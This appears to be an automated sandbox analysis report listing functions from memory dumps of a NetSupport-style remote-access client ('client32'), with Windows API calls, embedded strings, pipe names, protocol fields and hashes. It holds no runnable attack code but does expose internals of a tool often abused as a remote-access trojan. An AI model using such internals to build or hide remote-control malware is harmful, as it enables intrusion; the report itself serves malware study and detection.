Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13

GetDC.USER32(00000000), ref: 1104F4FA
GetACP.KERNEL32(View,CacheSize,00000400,00000000), ref: 1104F54E
GetDeviceCaps.GDI32(00000000,0000000E), ref: 1104F55D
GetDeviceCaps.GDI32(00000000,0000000C), ref: 1104F56C
GetDeviceCaps.GDI32(?,00000026), ref: 1104F58A
GetDeviceCaps.GDI32(?,00000068), ref: 1104F59A
ReleaseDC.USER32(00000000,?), ref: 1104F5C8
GetSystemMetrics.USER32(0000004C), ref: 1104F5D6
GetSystemMetrics.USER32(0000004D), ref: 1104F5E0

Strings

View, xrefs: 1104F514
\\.\pipe\nsm_ctl32_show_%d, xrefs: 1104F38E
idata->hShowEvent, xrefs: 1104F425
Show enabling mirror, xrefs: 1104F74E
CacheSize, xrefs: 1104F50D
CLTCONN.CPP, xrefs: 1104F420
Error creating hShowPipe, e=%d, xrefs: 1104F3CF

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CapsDevice$CloseProcess$CreateEventMetricsSystem$AddressClassCurrentErrorFileLastModuleNamedOpenPipePriorityProcReleaseStateThreadWindowwsprintf
String ID: CLTCONN.CPP$CacheSize$Error creating hShowPipe, e=%d$Show enabling mirror$View$\\.\pipe\nsm_ctl32_show_%d$idata->hShowEvent
API String ID: 1070019554-2085025582
Opcode ID: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
Instruction ID: a762959b66c2b007555d3d1dad52a1717f1328b6c18758764795a7a29e9eccb5
Opcode Fuzzy Hash: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
Instruction Fuzzy Hash: DBD13F74E007169FDB15CF68C888BEEB7F5BB48304F1085ADE96A97284DB74AA40CF51

Function 1109D0D0 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 278COMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109D152
OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109D175
CloseHandle.KERNEL32(00000000), ref: 1109D180
ResetEvent.KERNEL32(?), ref: 1109D195
ResetEvent.KERNEL32(?), ref: 1109D19B
SetEvent.KERNEL32(?), ref: 1109D1A1

Strings

cbdata=%d, datalen-sizeof=%d, xrefs: 1109D303
senderror, xrefs: 1109D3FF
no error, xrefs: 1109D3BA
..\CTL32\ipc.cpp, xrefs: 1109D31A
timeout, xrefs: 1109D246
deadshare, xrefs: 1109D217
iffy result, xrefs: 1109D425

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
API String ID: 1194186020-3727536503
Opcode ID: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
Instruction ID: 6b473be9785bc0d4b7e502112369cfe56b08eb277d01e6e1a90085580c10e120
Opcode Fuzzy Hash: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
Instruction Fuzzy Hash: 49B16FB5A007089BD720CF25D894B5AF7F5BF88314F10CA9DEA4A9B640CB70E981DF60

Function 11005390 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D470: __itow.LIBCMT ref: 1105D495

GetObjectA.GDI32(?,0000003C,?), ref: 11005465

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

wsprintfA.USER32 ref: 110054BD
DeleteObject.GDI32(?), ref: 11005512
DeleteObject.GDI32(?), ref: 1100551B
SelectObject.GDI32(?,?), ref: 11005532
DeleteObject.GDI32(?), ref: 11005538
DeleteDC.GDI32(?), ref: 1100553E
SelectObject.GDI32(?,?), ref: 1100554F
DeleteObject.GDI32(?), ref: 11005558
DeleteDC.GDI32(?), ref: 1100555E
DeleteObject.GDI32(?), ref: 1100556F
DeleteObject.GDI32(?), ref: 1100559A
DeleteObject.GDI32(?), ref: 110055B8
DeleteObject.GDI32(?), ref: 110055C1
ShowWindow.USER32(?,00000009), ref: 110055EF
PostQuitMessage.USER32(00000000), ref: 110055F7

Strings

PenWidth, xrefs: 1100540D
FillColour, xrefs: 1100542B
Font, xrefs: 110054CF
FillStyle, xrefs: 11005449
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 110054B7
PenStyle, xrefs: 110053EF
Tool, xrefs: 110053B3
Annotate, xrefs: 110053B8, 110053D6, 110053F4, 11005412, 11005430, 1100544E, 110054D4
PenColour, xrefs: 110053D1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 3453958691-770455996
Opcode ID: a4b3b1cb6e38c4758c195a3c9de24e958abacf994ffaf34fd91b8a055f761e2f
Instruction ID: 0e393dd9f50b4abf726b269e2623b848e1bd90be6afddd879db765a1a84127a1
Opcode Fuzzy Hash: a4b3b1cb6e38c4758c195a3c9de24e958abacf994ffaf34fd91b8a055f761e2f
Instruction Fuzzy Hash: 7A813AB5600605AFE364DBA5C990EABF7F9AF8C304F10450DF6AA97241DA71FC41CB60

Function 6859BED0 Relevance: 44.0, APIs: 7, Strings: 18, Instructions: 200COMMON

Download Yara Rule

APIs

Part of subcall function 685A75B0: _malloc.LIBCMT ref: 685A75D8

Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26

Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090

_free.LIBCMT ref: 6859BF22

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 6859BF51
_free.LIBCMT ref: 6859BF7C
_free.LIBCMT ref: 6859C005
_free.LIBCMT ref: 6859C034
_free.LIBCMT ref: 6859C063
_free.LIBCMT ref: 6859C109

Strings

DATA=, xrefs: 6859BF9F
APPTYPE=%d, xrefs: 6859BF85
OC=%d, xrefs: 6859C09F
DA=%d, xrefs: 6859C0B5
UN=%s, xrefs: 6859BF70
ED=%s, xrefs: 6859C028
BFLG=%d, xrefs: 6859BF94
SD=%s, xrefs: 6859BFF9
TZ=%d, xrefs: 6859C0F7
TM=%s, xrefs: 6859C057
YR=%d, xrefs: 6859C0E1
WP=%d, xrefs: 6859C089
WD=%u, xrefs: 6859C073
MO=%d, xrefs: 6859C0CB
UID=%s, xrefs: 6859BF16
TIMING=%d, xrefs: 6859BFC6
DEPT=%s, xrefs: 6859BF45
ID=%d, xrefs: 6859BEEE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$_malloc$ErrorFreeHeapLast__vswprintf
String ID: APPTYPE=%d$BFLG=%d$DA=%d$DATA=$DEPT=%s$ED=%s$ID=%d$MO=%d$OC=%d$SD=%s$TIMING=%d$TM=%s$TZ=%d$UID=%s$UN=%s$WD=%u$WP=%d$YR=%d
API String ID: 2888336863-1668223812
Opcode ID: 5f6e654067dc42f024d4c171069c0b345f5afc91ea3844a57abd888861314588
Instruction ID: 4ac3fbd877a0014275f0bfd1f2da07bf3f2596ecff889c667ec52b0ef473c7ae
Opcode Fuzzy Hash: 5f6e654067dc42f024d4c171069c0b345f5afc91ea3844a57abd888861314588
Instruction Fuzzy Hash: 69514EB9680604BBEB119B65CCC0E7F77BCAB94609FC08548FC5A96201EB34ED1586A9

Function 685A58B0 Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 262stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685A598A
lstrlenA.KERNEL32(00000000), ref: 685A59B1
_free.LIBCMT ref: 685A5A04
_free.LIBCMT ref: 685A5B4D
_free.LIBCMT ref: 685A5B8B
_free.LIBCMT ref: 685A5C02

Part of subcall function 68598C30: _memset.LIBCMT ref: 68598C5B
Part of subcall function 68598C30: _free.LIBCMT ref: 68598CCC

_free.LIBCMT ref: 685A5C69

Strings

DATA=, xrefs: 685A5BCC
TCPIP, xrefs: 685A5A39, 685A5A52, 685A5A62
CMD=BROADCASTDATA, xrefs: 685A5A9F
LEN=%d, xrefs: 685A5B9D
CHANNEL=%s, xrefs: 685A5B41
Port, xrefs: 685A5A4D
AT=%d, xrefs: 685A5B09
ListenPort, xrefs: 685A5A5D
*ControlPort, xrefs: 685A5A34
Gateway_Gsk, xrefs: 685A5913
*Gsk, xrefs: 685A599B
FROM=%s:%d, xrefs: 685A5ADF
GSK=%s, xrefs: 685A5AC9
FLAGS=%u, xrefs: 685A5AF4
ctl_broadcastdata - INVALID PARAMETER, xrefs: 685A596A
CSPEC=%s, xrefs: 685A5B7F

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$_memset$lstrlen
String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
API String ID: 1776203170-3520600413
Opcode ID: 3f222f001db363623bbc6e5e8fc402dfb860905e50367f45fce6ab83d0f3b326
Instruction ID: 5859deee622398186814a40ef6b55c4e5f9d9b91984dd677fafb4e7dc04c026d
Opcode Fuzzy Hash: 3f222f001db363623bbc6e5e8fc402dfb860905e50367f45fce6ab83d0f3b326
Instruction Fuzzy Hash: 36A182B5940218AFDB20DBA4CC98FEFB77CAF85305F8045D9E549A7141EB30AE848F65

Function 6859EEA0 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 182sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000304), ref: 6859EEC7
WaitForSingleObject.KERNEL32(000002FC,00001388), ref: 6859EED5
TerminateThread.KERNEL32(000002FC,000000FF), ref: 6859EEF5
CloseHandle.KERNEL32(000002FC), ref: 6859EF07
SetEvent.KERNEL32(00000294), ref: 6859EF16
ctl_hangup.HTCTL32(00000001), ref: 6859EF26
Sleep.KERNEL32(00000014), ref: 6859EFB8
CloseHandle.KERNEL32(00000304), ref: 6859EFCE
CloseHandle.KERNEL32(00000308), ref: 6859EFD6
CloseHandle.KERNEL32(00000294), ref: 6859EFDF
WSACleanup.WSOCK32 ref: 6859EFE9
CloseHandle.KERNEL32(00000300), ref: 6859EFFB
DeleteCriticalSection.KERNEL32(00000002), ref: 6859F01F
DeleteCriticalSection.KERNEL32(685DB898), ref: 6859F03A
_free.LIBCMT ref: 6859F043

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 6859F04F
_free.LIBCMT ref: 6859F07B
_free.LIBCMT ref: 6859F08D
_memset.LIBCMT ref: 6859F0A1
FreeLibrary.KERNEL32(?), ref: 6859F0BB
timeEndPeriod.WINMM(00000001), ref: 6859F0D6

Part of subcall function 68594610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 68594698

Strings

Error. Terminating httprecv Thread, xrefs: 6859EEDF
CMD=CLOSE, xrefs: 6859EF7D

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
String ID: CMD=CLOSE$Error. Terminating httprecv Thread
API String ID: 2861375113-448471891
Opcode ID: fc051a299ba01e1f24bd407cf94d445226a83a3aa14372878ccfdffad02cc4c7
Instruction ID: c30885a7dfc5ab60f188418b8a5d9162d0126681c6b198fba1298513d969a2a9
Opcode Fuzzy Hash: fc051a299ba01e1f24bd407cf94d445226a83a3aa14372878ccfdffad02cc4c7
Instruction Fuzzy Hash: 745182B5900245AFDF00EFB8CC809AF73B9BB86304B964569ED15D3240DB71ED408BAA

Function 68592CE0 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 68592A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592ADA
Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592AEA
Part of subcall function 68592A90: wsprintfA.USER32 ref: 68592B05

GetModuleHandleA.KERNEL32(NSMTRACE,68592AB1), ref: 68592CFA
GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 68592D15
GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 68592D22
GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 68592D2F
GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 68592D3C
GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 68592D49
GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 68592D56
GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 68592D63
GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 68592D70
GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 68592D7D
GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 68592D8A

Strings

NSMTraceUnexclusive, xrefs: 68592D72
NSMTraceSetModuleName, xrefs: 68592D7F
NSMTraceGetConfigItem, xrefs: 68592D24
vRealNSMTrace, xrefs: 68592D3E
NSMTraceExclusive, xrefs: 68592D65
NSMTRACE, xrefs: 68592CF5
NSMTraceReadConfigItemFromFile, xrefs: 68592D58
NSMTraceUnload, xrefs: 68592D17
NSMTraceLoad, xrefs: 68592D0F
NSMTraceGetConfigInt, xrefs: 68592D31
NSMTraceClose, xrefs: 68592D4B

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
API String ID: 3896832720-3703587661
Opcode ID: 8ad65fbfb9edc6d97113b092c94a711564aa7160940e34b45cad3c846fea24c6
Instruction ID: 770bbceb526b1b97399ff1f8ed56e5cd3388290f45b4577b88f391df738258f7
Opcode Fuzzy Hash: 8ad65fbfb9edc6d97113b092c94a711564aa7160940e34b45cad3c846fea24c6
Instruction Fuzzy Hash: D2019CB1C922646ACA60BB7E5C08ECE7A98EBD7352B830517FC04E6200F6744441CFAD

Function 110492D0 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 280COMMON

Download Yara Rule

APIs

Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A

Part of subcall function 110424D0: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 1104253A
Part of subcall function 110424D0: GetWindowLongA.USER32(00000000,000000F0), ref: 11042541
Part of subcall function 110424D0: IsWindow.USER32(00000000), ref: 1104254E
Part of subcall function 110424D0: GetWindowRect.USER32(00000000,11049320), ref: 11042565

GetCursorPos.USER32(?), ref: 11049334
WindowFromPoint.USER32(?,?,?,?,00000000), ref: 1104935B
GetClassNameA.USER32(00000000,?,00000040), ref: 1104936D
WaitForInputIdle.USER32(?,000003E8), ref: 11049488
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 1104949B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 110494A4
GetCursorPos.USER32(?), ref: 110494AD
EnumWindows.USER32(110425D0,?), ref: 11049504
GetWindowRect.USER32(?,?), ref: 11049520
WindowFromPoint.USER32(?,?,?,?,?,?,?,00000000), ref: 1104953A
GetClassNameA.USER32(00000000,?,00000040), ref: 11049549

Strings

Client, xrefs: 110494CF, 1104961E
NSMCoolbar, xrefs: 11049394, 11049574
*ExitMetroCloseDelay, xrefs: 11049619
ActivateStui=-1, @%d,%d, actwin=%x [%s], xrefs: 11049567
', xrefs: 110495C2
ActivateStui=%d, @%d,%d, actwin=%x [%s], xrefs: 11049387
"%sNSClientTB.exe", xrefs: 11049431
*ExitMetroBreak, xrefs: 110494BE

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows_memset_strncpy
String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
API String ID: 4093120923-2853765610
Opcode ID: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
Instruction ID: 1967bb51930ead73ce48ca5e19d163332f2271a687d5ff16e8e37c73a50f3493
Opcode Fuzzy Hash: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
Instruction Fuzzy Hash: 82A1C575E01229AFDB11CFA0CCC5FAAB7B9EB4A704F1041F9E919A7280E7316944CF61

Function 110ED290 Relevance: 36.2, APIs: 24, Instructions: 222windowmemoryCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 110ED2AE
GetStockObject.GDI32(0000000F), ref: 110ED2C2
GetDC.USER32(00000000), ref: 110ED33A
SelectPalette.GDI32(00000000,00000000,00000000), ref: 110ED34B
RealizePalette.GDI32(00000000), ref: 110ED351
GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110ED36C
SelectPalette.GDI32(00000000,?,00000001), ref: 110ED380
RealizePalette.GDI32(00000000), ref: 110ED383
ReleaseDC.USER32(00000000,00000000), ref: 110ED38B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
